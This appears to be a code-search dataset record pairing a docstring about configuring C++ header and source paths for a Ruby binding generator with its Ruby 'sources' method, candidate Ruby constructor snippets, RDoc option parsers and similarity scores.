"def initialize(name)\n @name = name\n @options = {}\n\n yield self if block_given?\n\n define\n end",
"def util_dummy_extension(spec, name = \"a\")\n extconf = File.join(\"ext\", name, \"extconf.rb\")\n dummy_c = File.join(\"ext\", name, \"dummy.c\")\n\n spec.extensions << extconf\n spec.files << dummy_c\n\n dir = spec.gem_dir\n FileUtils.mkdir_p dir\n\n Dir.chdir dir do\n FileUtils.mkdir_p File.dirname(extconf)\n\n # extconf.rb\n File.open extconf, \"w\" do |f|\n f.write <<~EOF\n require \"mkmf\"\n\n create_makefile(\"#{name}\")\n EOF\n end\n\n # dummy.c\n File.open dummy_c, \"w\" do |f|\n f.write <<~EOF\n #include <ruby.h>\n\n void Init_#{name}(void)\n {\n rb_p(ID2SYM(rb_intern(\"ok\")));\n }\n EOF\n end\n end\n end",
"def initialize(name)\n name(name)\n end",
"def create_by_name(name)\n self.new.tap do |o|\n o.name = name # ambos sirven\n end\n end",
"def initialize(name)\n @name = name\n @files = []\n @quiet = false\n\n # Allow custom configuration to be defined in a block passed to constructor\n yield self if block_given?\n\n define\n end",
"def initialize(name=:spec)\n @name = name\n @libs = [\"lib\"]\n @pattern = nil\n @options = nil\n @spec_files = nil\n @spec_opts = []\n @warning = false\n @rcov = false\n @ruby_opts = []\n @out = nil\n @fail_on_error = true\n yield self if block_given?\n @pattern = 'spec/**/*_spec.rb' if @pattern.nil? && @spec_files.nil?\n define\n end",
"def initialize ( myname = \"Ruby\" )\n @name = myname\n end",
"def initialize(name)\n \n @name = name\n end",
"def initialize(name, parser, &block)\n @name = name\n @parser = parser\n @modules = []\n @wrapped_functions = []\n @wrapped_classes = []\n @wrapped_structs = []\n\n block.call(self) if block\n end",
"def initialize(name)\n @name = name\n load \n end",
"def initialize(name)\n self.name = name\n end",
"def initialize(name = nil, version = nil)\n super()\n @gems_dir = nil\n @base_dir = nil\n @loaded = false\n @activated = false\n @loaded_from = nil\n @original_platform = nil\n @installed_by_version = nil\n\n set_nil_attributes_to_nil\n set_not_nil_attributes_to_default_values\n\n @new_platform = Gem::Platform::RUBY\n\n self.name = name if name\n self.version = version if version\n\n if platform = Gem.platforms.last and platform != Gem::Platform::RUBY and platform != Gem::Platform.local\n self.platform = platform\n end\n\n yield self if block_given?\n end",
"def module(name, &block)\n m = RbModule.new(name, @parser, &block)\n m.parent = self\n @modules << m\n end",
"def initialize(name)\n self.name = name\n end",
"def initialize( name = nil, version = nil )\n @name = name\n @version = version\n @install_commands = []\n @build_commands = []\n yield self if block_given?\n @upstream_source = URI.parse( @upstream_source )\n define unless name.nil? or version.nil?\n end",
"def initialize(name, data)\n @name = name\n @extname = File.extname(name)\n @_data = data\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n # Check and set the name\n @name = name.to_sym\n\n # Initialize the internals of the pipeline.\n\n\n # Initialize the environment for building the pipeline\n\n # The stages\n @stages = []\n\n # The event synchronizing the pipeline\n @mk_ev = proc { $clk.posedge }\n\n # The reset\n @mk_rst = proc { $rst }\n\n # Creates the namespace to execute the pipeline block in.\n @namespace = Namespace.new(self)\n\n # Generates the function for setting up the pipeline.\n obj = self # For using the right self within the proc\n HDLRuby::High.space_reg(@name) do |&ruby_block|\n if ruby_block then\n # Builds the pipeline.\n obj.build(&ruby_block)\n else\n # Return the pipeline as is.\n return obj\n end\n end\n\n end",
"def initialize(name=:js_build)\n @name = name\n @description = \"Building/Concatenating the JS files\"\n @pattern = '*.js'\n @deps = []\n @outdir = \".\"\n @inputdirs = []\n\n # don't look here!\n @file_list = []\n\n yield self if block_given?\n define\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name=:spec)\n @name = name\n @libs = [File.expand_path(File.dirname(__FILE__) + '/../../../lib')]\n @pattern = nil\n @spec_files = nil\n @spec_opts = []\n @warning = false\n @ruby_opts = []\n @fail_on_error = true\n @rcov = false\n @rcov_opts = ['--exclude', 'lib\\/spec,bin\\/spec,config\\/boot.rb']\n @rcov_dir = \"coverage\"\n\n yield self if block_given?\n @pattern = 'spec/**/*_spec.rb' if pattern.nil? && spec_files.nil?\n define\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\r\n @name = name\r\n end",
"def initialize(name)\r\n @name = name\r\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name = '')\n self.name = name\n end",
"def initialize(name)\n @name = name\n \n end",
"def initialize(namespace_name = nil, &block)\n if block_given?\n instance_eval(&block)\n else\n raise ArgumentError if namespace_name.nil?\n\n self.name = namespace_name\n end\n end",
"def initialize(name, options = {})\n runtime = defined?(Runtime) ? Runtime : {}\n \n options = {\n :parent => runtime['Object'], \n :is_ghost => false, \n :is_module => false\n }.update(options)\n \n @name = name\n @runtime_methods = {}\n @parent = options[:parent]\n @is_ghost = options[:is_ghost]\n @is_module = options[:is_module]\n \n # Check if we're bootstrapping (launching the runtime). During this process the \n # runtime is not fully initialized and core classes do not yet exists, so we defer \n # using those once the language is bootstrapped.\n # This solves the chicken-or-the-egg problem with the Class class. We can \n # initialize Class then set Class.class = Class.\n runtime_class = runtime['Class']\n \n super runtime_class\n \n # Create the ghost class (if not already a ghost), deriving it from the ghost class of the current class's parent.\n # This will allow for the inheritance of the so called \"class\" methods.\n singleton_class(options[:parent].singleton_class) if !options[:is_ghost] && runtime_class\n end",
"def initialize(name)\n VAPI::Util.check_type(self, 'name', name, String)\n self.name = name\n end",
"def initialize(name)\n @name = name #has a name\n @@all << self\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize name\n @name = name\n end",
"def define_constructor(name)\n return false if not self::CONVERSIONS[name.to_sym]\n self.class.instance_exec do\n define_method( name.to_sym ) do | *args |\n new( args[ 0 ].to_f * self::CONVERSIONS[ name ] )\n end\n end\n end",
"def initialize(*argv, &argb)\n @name = ''\n if name = argv.find {|arg| arg.is_a?(String) }\n @name = name\n end\n fyx_initialize_save_name(*argv, &argb)\n end",
"def initialize(name)\n @name = name\n raise ArgumentError, \"No name present\" if name.empty?\n end"
] |
[
"0.6536697",
"0.64527035",
"0.6447034",
"0.6431908",
"0.63207275",
"0.6304655",
"0.62451303",
"0.62451303",
"0.62451303",
"0.6201769",
"0.6179208",
"0.61736387",
"0.61668783",
"0.61409473",
"0.6065675",
"0.60537136",
"0.60520977",
"0.60520977",
"0.5981832",
"0.59575945",
"0.5933919",
"0.592173",
"0.59197116",
"0.59119743",
"0.5908881",
"0.5904897",
"0.58922625",
"0.5869694",
"0.5868423",
"0.58641446",
"0.5857986",
"0.5829412",
"0.58256906",
"0.58144",
"0.5814365",
"0.57966983",
"0.57922554",
"0.57903504",
"0.57832634",
"0.57832634",
"0.57832634",
"0.57832634",
"0.57832634",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57392466",
"0.5693393",
"0.56924003",
"0.5671499",
"0.56562746",
"0.5654003",
"0.5654003",
"0.5653579",
"0.5652964",
"0.5637684",
"0.5635255",
"0.5620698",
"0.5610901",
"0.56004924",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.55946636",
"0.5594631",
"0.5594192",
"0.55748516"
] |
0.58629173
|
30
|
Define where we can find the header files to parse. Can give an array of directories, a glob, or just a string. All file names should be full paths, not relative. Options can be any or all of the following:

:include_paths - Path(s) to be added as -I flags
:library_paths - Path(s) to be added as -L flags
:libraries - Path(s) to be added as -l flags
:cxxflags - Flag(s) to be added to the command line for parsing / compiling
:ldflags - Flag(s) to be added to the command line for linking
:includes - Header file(s) to include at the beginning of each generated .rb.cpp file
:include_source_files - C++ source files that need to be compiled into the extension but not wrapped
:include_source_dir - A combination option for reducing duplication; this option will query the given directory for source files, adding all to :include_source_files and adding all h/hpp files to :includes
|
def sources(dirs, options = {})
parser_options = {
:includes => [],
:cxxflags => [
# Force castxml into C++ mode
"-x c++",
# Allow things like `<::`
"-fpermissive"
]
}
if (code_dir = options.delete(:include_source_dir))
options[:include_source_files] ||= []
options[:includes] ||= []
Dir["#{code_dir}/*"].each do |f|
next if File.directory?(f)
options[:include_source_files] << f
end
end
if (paths = options.delete(:include_paths))
@options[:include_paths] << paths
parser_options[:includes] << paths
end
if (lib_paths = options.delete(:library_paths))
@options[:library_paths] << lib_paths
end
if (libs = options.delete(:libraries))
@options[:libraries] << libs
end
if (flags = options.delete(:cxxflags))
@options[:cxxflags] << flags
parser_options[:cxxflags] << flags
end
if (flags = options.delete(:ldflags))
@options[:ldflags] << flags
end
if (files = options.delete(:include_source_files))
@options[:include_source_files] << files
options[:includes] ||= []
[files].flatten.each do |f|
options[:includes] << f if File.extname(f) =~ /hpp/i || File.extname(f) =~ /h/i
end
end
if (flags = options.delete(:includes))
includes = Dir.glob(flags)
if(includes.length == 0)
puts "Warning: There were no matches for includes #{flags.inspect}"
else
@options[:includes] += [*includes]
end
end
@options[:includes] += [*dirs]
@sources = Dir.glob dirs
Logger.info "Parsing #{@sources.inspect}"
@parser = RbGCCXML.parse(dirs, parser_options)
end
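
Putting the options together, a call might look like this; a minimal sketch with hypothetical paths, exercising the glob handling and the :include_source_dir expansion described above:

e.sources "#{Dir.pwd}/include/**/*.h",
          :include_paths      => ["#{Dir.pwd}/include"],
          :library_paths      => ['/usr/local/lib'],
          :libraries          => ['mylib'],                 # hypothetical native library
          :cxxflags           => ['-std=c++11'],
          :include_source_dir => "#{Dir.pwd}/ext_support"   # .cpp files compiled in, .h/.hpp files added to :includes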
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def header_include_paths\n cmd = RbConfig::MAKEFILE_CONFIG[\"CC\"]\n args = %w{-Wp,-v -xc /dev/null -fsyntax-only}\n paths = []\n reading_paths = false\n run_command(cmd, *args) do |line|\n line.chomp!\n if reading_paths\n if line == 'End of search list.'\n reading_paths = false\n elsif line.match(/\\A /)\n line.strip!\n line.sub!(/\\s+\\(framework directory\\)\\Z/, '')\n paths << line\n end\n elsif line == '#include <...> search starts here:'\n reading_paths = true\n end\n end\n paths\nend",
"def header_files\n source_files(HPP_EXTENSIONS)\n end",
"def cpp_headers( cpp, inc_dirs )\n headers = []\n\n p = Pathname.new( cpp )\n path_prefix = p.dirname.to_s + \"/\"\n # print path_prefix, \"\\n\"\n cpp_file = File.new( cpp, \"r\" )\n cpp_file.each do |line|\n # print line\n inc = line.match( /#include +\"([\\w]+\\.h)\"/ )\n if ( ! inc.nil? )\n # inc_path = path_prefix + inc[1]\n inc_path = header_path( inc[1], inc_dirs )\n if not inc_path.nil?\n # print inc_path, \"\\n\"\n headers << inc_path\n end\n end\n end\n return headers\nend",
"def parse(argv)\n accessors = []\n\n opts = OptionParser.new do |opt|\n opt.program_name = File.basename $0\n opt.version = RDoc::VERSION\n opt.release = nil\n opt.summary_indent = ' ' * 4\n opt.banner = <<-EOF\nUsage: #{opt.program_name} [options] [names...]\n\n Files are parsed, and the information they contain collected, before any\n output is produced. This allows cross references between all files to be\n resolved. If a name is a directory, it is traversed. If no names are\n specified, all Ruby files in the current directory (and subdirectories) are\n processed.\n\n How RDoc generates output depends on the output formatter being used, and on\n the options you give.\n\n - Darkfish is an improved, frameless HTML output by Michael Granger.\n\n - HTML output is normally produced into a number of separate files\n (one per class, module, and file, along with various indices).\n These files will appear in the directory given by the --op\n option (doc/ by default).\n\n - XML output by default is written to standard output. If a\n --opname option is given, the output will instead be written\n to a file with that name in the output directory.\n\n - .chm files (Windows help files) are written in the --op directory.\n If an --opname parameter is present, that name is used, otherwise\n the file will be called rdoc.chm.\n EOF\n\n opt.separator nil\n opt.separator \"Options:\"\n opt.separator nil\n\n opt.on(\"--accessor=ACCESSORS\", \"-A\", Array,\n \"A comma separated list of additional class\",\n \"methods that should be treated like\",\n \"'attr_reader' and friends.\",\n \" \",\n \"Option may be repeated.\",\n \" \",\n \"Each accessorname may have '=text'\",\n \"appended, in which case that text appears\",\n \"where the r/w/rw appears for normal.\",\n \"accessors\") do |value|\n value.each do |accessor|\n if accessor =~ /^(\\w+)(=(.*))?$/\n accessors << $1\n @extra_accessor_flags[$1] = $3\n end\n end\n end\n\n opt.separator nil\n\n opt.on(\"--all\", \"-a\",\n \"Include all methods (not just public) in\",\n \"the output.\") do |value|\n @show_all = value\n end\n\n opt.separator nil\n\n opt.on(\"--charset=CHARSET\", \"-c\",\n \"Specifies the output HTML character-set.\") do |value|\n @charset = value\n end\n\n opt.separator nil\n\n opt.on(\"--debug\", \"-D\",\n \"Displays lots on internal stuff.\") do |value|\n $DEBUG_RDOC = value\n end\n\n opt.separator nil\n\n opt.on(\"--diagram\", \"-d\",\n \"Generate diagrams showing modules and\",\n \"classes. You need dot V1.8.6 or later to\",\n \"use the --diagram option correctly. Dot is\",\n \"available from http://graphviz.org\") do |value|\n check_diagram\n @diagram = true\n end\n\n opt.separator nil\n\n opt.on(\"--exclude=PATTERN\", \"-x\", Regexp,\n \"Do not process files or directories\",\n \"matching PATTERN.\") do |value|\n @exclude << value\n end\n\n opt.separator nil\n\n opt.on(\"--extension=NEW=OLD\", \"-E\",\n \"Treat files ending with .new as if they\",\n \"ended with .old. Using '-E cgi=rb' will\",\n \"cause xxx.cgi to be parsed as a Ruby file.\") do |value|\n new, old = value.split(/=/, 2)\n\n unless new and old then\n raise OptionParser::InvalidArgument, \"Invalid parameter to '-E'\"\n end\n\n unless RDoc::ParserFactory.alias_extension old, new then\n raise OptionParser::InvalidArgument, \"Unknown extension .#{old} to -E\"\n end\n end\n\n opt.separator nil\n\n opt.on(\"--fileboxes\", \"-F\",\n \"Classes are put in boxes which represents\",\n \"files, where these classes reside. 
Classes\",\n \"shared between more than one file are\",\n \"shown with list of files that are sharing\",\n \"them. Silently discarded if --diagram is\",\n \"not given.\") do |value|\n @fileboxes = value\n end\n\n opt.separator nil\n\n opt.on(\"--force-update\", \"-U\",\n \"Forces rdoc to scan all sources even if\",\n \"newer than the flag file.\") do |value|\n @force_update = value\n end\n\n opt.separator nil\n\n generator_text = @generators.keys.map { |name| \" #{name}\" }.sort\n\n opt.on(\"--fmt=FORMAT\", \"--format=FORMAT\", \"-f\", @generators.keys,\n \"Set the output formatter. One of:\", *generator_text) do |value|\n @generator_name = value.downcase\n setup_generator\n end\n\n opt.separator nil\n\n image_formats = %w[gif png jpg jpeg]\n opt.on(\"--image-format=FORMAT\", \"-I\", image_formats,\n \"Sets output image format for diagrams. Can\",\n \"be #{image_formats.join ', '}. If this option\",\n \"is omitted, png is used. Requires\",\n \"diagrams.\") do |value|\n @image_format = value\n end\n\n opt.separator nil\n\n opt.on(\"--include=DIRECTORIES\", \"-i\", Array,\n \"set (or add to) the list of directories to\",\n \"be searched when satisfying :include:\",\n \"requests. Can be used more than once.\") do |value|\n @rdoc_include.concat value.map { |dir| dir.strip }\n end\n\n opt.separator nil\n\n opt.on(\"--inline-source\", \"-S\",\n \"Show method source code inline, rather than\",\n \"via a popup link.\") do |value|\n @inline_source = value\n end\n\n opt.separator nil\n\n opt.on(\"--line-numbers\", \"-N\",\n \"Include line numbers in the source code.\") do |value|\n @include_line_numbers = value\n end\n\n opt.separator nil\n\n opt.on(\"--main=NAME\", \"-m\",\n \"NAME will be the initial page displayed.\") do |value|\n @main_page = value\n end\n\n opt.separator nil\n\n opt.on(\"--merge\", \"-M\",\n \"When creating ri output, merge previously\",\n \"processed classes into previously\",\n \"documented classes of the same name.\") do |value|\n @merge = value\n end\n\n opt.separator nil\n\n opt.on(\"--one-file\", \"-1\",\n \"Put all the output into a single file.\") do |value|\n @all_one_file = value\n @inline_source = value if value\n @template = 'one_page_html'\n end\n\n opt.separator nil\n\n opt.on(\"--op=DIR\", \"-o\",\n \"Set the output directory.\") do |value|\n @op_dir = value\n end\n\n opt.separator nil\n\n opt.on(\"--opname=NAME\", \"-n\",\n \"Set the NAME of the output. Has no effect\",\n \"for HTML.\") do |value|\n @op_name = value\n end\n\n opt.separator nil\n\n opt.on(\"--promiscuous\", \"-p\",\n \"When documenting a file that contains a\",\n \"module or class also defined in other\",\n \"files, show all stuff for that module or\",\n \"class in each files page. By default, only\",\n \"show stuff defined in that particular file.\") do |value|\n @promiscuous = value\n end\n\n opt.separator nil\n\n opt.on(\"--quiet\", \"-q\",\n \"Don't show progress as we parse.\") do |value|\n @verbosity = 0\n end\n\n opt.on(\"--verbose\", \"-v\",\n \"Display extra progress as we parse.\") do |value|\n @verbosity = 2\n end\n\n\n opt.separator nil\n\n opt.on(\"--ri\", \"-r\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in the '.rdoc' directory under\",\n \"your home directory unless overridden by a\",\n \"subsequent --op parameter, so no special\",\n \"privileges are needed.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::HOMEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--ri-site\", \"-R\",\n \"Generate output for use by `ri`. 
The files\",\n \"are stored in a site-wide directory,\",\n \"making them accessible to others, so\",\n \"special privileges are needed.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::SITEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--ri-system\", \"-Y\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in a site-wide directory,\",\n \"making them accessible to others, so\",\n \"special privileges are needed. This\",\n \"option is intended to be used during Ruby\",\n \"installation.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::SYSDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--show-hash\", \"-H\",\n \"A name of the form #name in a comment is a\",\n \"possible hyperlink to an instance method\",\n \"name. When displayed, the '#' is removed\",\n \"unless this option is specified.\") do |value|\n @show_hash = value\n end\n\n opt.separator nil\n\n opt.on(\"--style=URL\", \"-s\",\n \"Specifies the URL of a separate stylesheet.\") do |value|\n @css = value\n end\n\n opt.separator nil\n\n opt.on(\"--tab-width=WIDTH\", \"-w\", OptionParser::DecimalInteger,\n \"Set the width of tab characters.\") do |value|\n @tab_width = value\n end\n\n opt.separator nil\n\n opt.on(\"--template=NAME\", \"-T\",\n \"Set the template used when generating\",\n \"output.\") do |value|\n @template = value\n end\n\n opt.separator nil\n\n opt.on(\"--title=TITLE\", \"-t\",\n \"Set TITLE as the title for HTML output.\") do |value|\n @title = value\n end\n\n opt.separator nil\n\n opt.on(\"--webcvs=URL\", \"-W\",\n \"Specify a URL for linking to a web frontend\",\n \"to CVS. If the URL contains a '\\%s', the\",\n \"name of the current file will be\",\n \"substituted; if the URL doesn't contain a\",\n \"'\\%s', the filename will be appended to it.\") do |value|\n @webcvs = value\n end\n end\n\n argv.insert(0, *ENV['RDOCOPT'].split) if ENV['RDOCOPT']\n\n opts.parse! argv\n\n @files = argv.dup\n\n @rdoc_include << \".\" if @rdoc_include.empty?\n\n if @exclude.empty? then\n @exclude = nil\n else\n @exclude = Regexp.new(@exclude.join(\"|\"))\n end\n\n check_files\n\n # If no template was specified, use the default template for the output\n # formatter\n\n @template ||= @generator_name\n\n # Generate a regexp from the accessors\n unless accessors.empty? then\n re = '^(' + accessors.map { |a| Regexp.quote a }.join('|') + ')$'\n @extra_accessors = Regexp.new re\n end\n\n rescue OptionParser::InvalidArgument, OptionParser::InvalidOption => e\n puts opts\n puts\n puts e\n exit 1\n end",
"def find_includes include_dirs, src\r\n includes = Rake::CParser.parse_file_includes src\r\n res = includes.collect { |inc|\r\n search_includes include_dirs, src, inc\r\n }\r\n res.compact\r\n end",
"def get_sources(filepath)\n content = File.read(filepath, mode: 'r')\n headers = content.scan(/^#include\\ \\\"(.*?)\\\"/m).map { |header| header[0] }\n file_dir = File.dirname(filepath)\n result = headers.map do |header|\n source = File.path(\"#{file_dir}/#{header.gsub(/.h$/, '.cpp')}\")\n raise \"File #{source} does not exist\" unless File.exist? source\n\n source\n end.to_set\n result + headers.map do |header|\n File.path \"#{file_dir}/#{header}\"\n end\nend",
"def includes(*args)\n @options[:include] ||= []\n @options[:include] |= args\n end",
"def includes(*paths)\n self.included_files.concat(expand_globs(paths))\n end",
"def include_args(aux_libraries)\n all_aux_include_dirs = arduino_library_src_dirs(aux_libraries)\n places = [ARDUINO_HEADER_DIR, UNITTEST_HEADER_DIR] + header_dirs + all_aux_include_dirs\n places.map { |d| \"-I#{d}\" }\n end",
"def initialize(options={})\n @bundle = Set[]\n @include_dirs = Set[]\n @require_paths = Set[]\n @require_globs = Set[]\n\n if options[:include]\n options[:include].each do |dir|\n @include_dirs << File.expand_path(dir)\n end\n end\n\n case options[:bundle]\n when String, Symbol\n @bundle << options[:bundle].to_sym\n when Enumerable\n options[:bundle].each do |group|\n @bundle << group.to_sym\n end\n when true\n @bundle << :default\n end\n\n if options[:require]\n @require_paths += options[:require]\n end\n\n if options[:require_all]\n @require_globs += options[:require_all]\n end\n end",
"def initialize(input = [\"{lib,app}/**/*.rb\", \"ext/**/*.c\"], output = \"doc/json\", options = {})\n @input = input\n @output = output\n @options = options\n end",
"def cpp_includes\n\t\tselect {|x| x.class == CppInclude }\n\tend",
"def parse(argv)\n opts = OptionParser.new do |opt|\n opt.program_name = File.basename $0\n opt.version = RDoc::VERSION\n opt.release = nil\n opt.summary_indent = ' ' * 4\n opt.banner = <<-EOF\nUsage: #{opt.program_name} [options] [names...]\n\n Files are parsed, and the information they contain collected, before any\n output is produced. This allows cross references between all files to be\n resolved. If a name is a directory, it is traversed. If no names are\n specified, all Ruby files in the current directory (and subdirectories) are\n processed.\n\n How RDoc generates output depends on the output formatter being used, and on\n the options you give.\n\n - Darkfish creates frameless HTML output by Michael Granger.\n\n - ri creates ri data files\n EOF\n\n opt.separator nil\n opt.separator \"Parsing Options:\"\n opt.separator nil\n\n opt.on(\"--all\", \"-a\",\n \"Include all methods (not just public) in\",\n \"the output.\") do |value|\n @show_all = value\n end\n\n opt.separator nil\n\n opt.on(\"--exclude=PATTERN\", \"-x\", Regexp,\n \"Do not process files or directories\",\n \"matching PATTERN.\") do |value|\n @exclude << value\n end\n\n opt.separator nil\n\n opt.on(\"--extension=NEW=OLD\", \"-E\",\n \"Treat files ending with .new as if they\",\n \"ended with .old. Using '-E cgi=rb' will\",\n \"cause xxx.cgi to be parsed as a Ruby file.\") do |value|\n new, old = value.split(/=/, 2)\n\n unless new and old then\n raise OptionParser::InvalidArgument, \"Invalid parameter to '-E'\"\n end\n\n unless RDoc::ParserFactory.alias_extension old, new then\n raise OptionParser::InvalidArgument, \"Unknown extension .#{old} to -E\"\n end\n end\n\n opt.separator nil\n\n opt.on(\"--force-update\", \"-U\",\n \"Forces rdoc to scan all sources even if\",\n \"newer than the flag file.\") do |value|\n @force_update = value\n end\n\n opt.separator nil\n\n opt.on(\"--pipe\",\n \"Convert RDoc on stdin to HTML\") do\n @pipe = true\n end\n\n opt.separator nil\n\n opt.on(\"--threads=THREADS\", Integer,\n \"Number of threads to parse with.\") do |threads|\n @threads = threads\n end\n\n opt.separator nil\n opt.separator \"Generator Options:\"\n opt.separator nil\n\n opt.on(\"--charset=CHARSET\", \"-c\",\n \"Specifies the output HTML character-set.\") do |value|\n @charset = value\n end\n\n opt.separator nil\n\n generator_text = @generators.keys.map { |name| \" #{name}\" }.sort\n\n opt.on(\"--fmt=FORMAT\", \"--format=FORMAT\", \"-f\", @generators.keys,\n \"Set the output formatter. One of:\", *generator_text) do |value|\n @generator_name = value.downcase\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--include=DIRECTORIES\", \"-i\", Array,\n \"Set (or add to) the list of directories to\",\n \"be searched when satisfying :include:\",\n \"requests. Can be used more than once.\") do |value|\n @rdoc_include.concat value.map { |dir| dir.strip }\n end\n\n opt.separator nil\n\n opt.on(\"--line-numbers\", \"-N\",\n \"Include line numbers in the source code.\") do |value|\n @include_line_numbers = value\n end\n\n opt.separator nil\n\n opt.on(\"--main=NAME\", \"-m\",\n \"NAME will be the initial page displayed.\") do |value|\n @main_page = value\n end\n\n opt.separator nil\n\n opt.on(\"--output=DIR\", \"--op\", \"-o\",\n \"Set the output directory.\") do |value|\n @op_dir = value\n end\n\n opt.separator nil\n\n opt.on(\"--show-hash\", \"-H\",\n \"A name of the form #name in a comment is a\",\n \"possible hyperlink to an instance method\",\n \"name. 
When displayed, the '#' is removed\",\n \"unless this option is specified.\") do |value|\n @show_hash = value\n end\n\n opt.separator nil\n\n opt.on(\"--open-source\", \"-s\",\n \"Include source code to your documentation\") do |value|\n @open_source = value\n end\n\n opt.separator nil\n\n opt.on(\"--tab-width=WIDTH\", \"-w\", OptionParser::DecimalInteger,\n \"Set the width of tab characters.\") do |value|\n @tab_width = value\n end\n\n opt.separator nil\n\n opt.on(\"--template=NAME\", \"-T\",\n \"Set the template used when generating\",\n \"output.\") do |value|\n @template = value\n end\n\n opt.separator nil\n\n opt.on(\"--title=TITLE\", \"-t\",\n \"Set TITLE as the title for HTML output.\") do |value|\n @title = value\n end\n\n opt.separator nil\n\n opt.on(\"--webcvs=URL\", \"-W\",\n \"Specify a URL for linking to a web frontend\",\n \"to CVS. If the URL contains a '\\%s', the\",\n \"name of the current file will be\",\n \"substituted; if the URL doesn't contain a\",\n \"'\\%s', the filename will be appended to it.\") do |value|\n @webcvs = value\n end\n\n opt.separator nil\n opt.separator \"Diagram Options:\"\n opt.separator nil\n\n image_formats = %w[gif png jpg jpeg]\n opt.on(\"--image-format=FORMAT\", \"-I\", image_formats,\n \"Sets output image format for diagrams. Can\",\n \"be #{image_formats.join ', '}. If this option\",\n \"is omitted, png is used. Requires\",\n \"diagrams.\") do |value|\n @image_format = value\n end\n\n opt.separator nil\n\n opt.on(\"--diagram\", \"-d\",\n \"Generate diagrams showing modules and\",\n \"classes. You need dot V1.8.6 or later to\",\n \"use the --diagram option correctly. Dot is\",\n \"available from http://graphviz.org\") do |value|\n check_diagram\n @diagram = true\n end\n\n opt.separator nil\n\n opt.on(\"--fileboxes\", \"-F\",\n \"Classes are put in boxes which represents\",\n \"files, where these classes reside. Classes\",\n \"shared between more than one file are\",\n \"shown with list of files that are sharing\",\n \"them. Silently discarded if --diagram is\",\n \"not given.\") do |value|\n @fileboxes = value\n end\n\n opt.separator nil\n opt.separator \"ri Generator Options:\"\n opt.separator nil\n\n opt.on(\"--ri\", \"-r\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in the '.rdoc' directory under\",\n \"your home directory unless overridden by a\",\n \"subsequent --op parameter, so no special\",\n \"privileges are needed.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::HOMEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--ri-site\", \"-R\",\n \"Generate output for use by `ri`. 
The files\",\n \"are stored in a site-wide directory,\",\n \"making them accessible to others, so\",\n \"special privileges are needed.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::SITEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--merge\", \"-M\",\n \"When creating ri output, merge previously\",\n \"processed classes into previously\",\n \"documented classes of the same name.\") do |value|\n @merge = value\n end\n\n opt.separator nil\n opt.separator \"Generic Options:\"\n opt.separator nil\n\n opt.on(\"--debug\", \"-D\",\n \"Displays lots on internal stuff.\") do |value|\n $DEBUG_RDOC = value\n end\n\n opt.on(\"--quiet\", \"-q\",\n \"Don't show progress as we parse.\") do |value|\n @verbosity = 0\n end\n\n opt.on(\"--verbose\", \"-v\",\n \"Display extra progress as we parse.\") do |value|\n @verbosity = 2\n end\n\n opt.separator nil\n opt.separator 'Deprecated options - these warn when set'\n opt.separator nil\n\n opt.on(\"--inline-source\", \"-S\") do |value|\n warn \"--inline-source will be removed from RDoc on or after August 2009\"\n end\n\n opt.on(\"--promiscuous\", \"-p\") do |value|\n warn \"--promiscuous will be removed from RDoc on or after August 2009\"\n end\n\n opt.separator 